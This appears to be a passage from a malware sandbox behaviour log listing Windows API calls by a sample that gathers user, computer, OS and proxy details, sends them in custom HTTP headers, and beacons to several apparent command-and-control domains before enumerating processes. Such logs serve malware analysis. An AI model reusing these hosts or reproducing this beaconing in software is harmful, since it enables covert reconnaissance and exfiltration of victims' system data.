| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rpersist4/1197631235 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = xmpp.dolcesognar.it, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = xmpp.dolcesognar.it/rpersist4/1197631235 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = spop.lestanzedifederica.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = spop.lestanzedifederica.com/rpersist4/1197631235 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyEnable, data = 0 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = spop.lestanzedifederica.com, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = spop.lestanzedifederica.com/rpersist4/1197631235 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = arb.palaser.eu, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = arb.palaser.eu/rpersist4/1197631235 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = arb.palaser.eu, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = arb.palaser.eu/rpersist4/1197631235 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_DIRECT |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = gttopr.space, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = gttopr.space/rpersist4/1197631235 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = gttopr.space, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /rpersist4/1197631235, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-File-Name: C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Name: X2VS1CUM\Nd9E1FYi |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyServer |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = ProxyOverride |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoConfigURL |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-ComputerName: X2VS1CUM |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-OSVersion: 6.2.9200| 0.0|1|0x00000100 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-VendorId: 3007 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\* |
|
1 | |
| Environment | Get Environment String | name = crackmeololo |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-IsTrustedComp: 0 |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-HTTP-Agent: WININET |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Present: FALSE |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-Used: FALSE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value_name = AutoDetect |
|
1 | |
| Inet | Add HTTP Request Headers | headers = X-Proxy-AutoDetect: FALSE |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = gttopr.space/rpersist4/1197631235 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 |
Thread 0xa54
27846
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
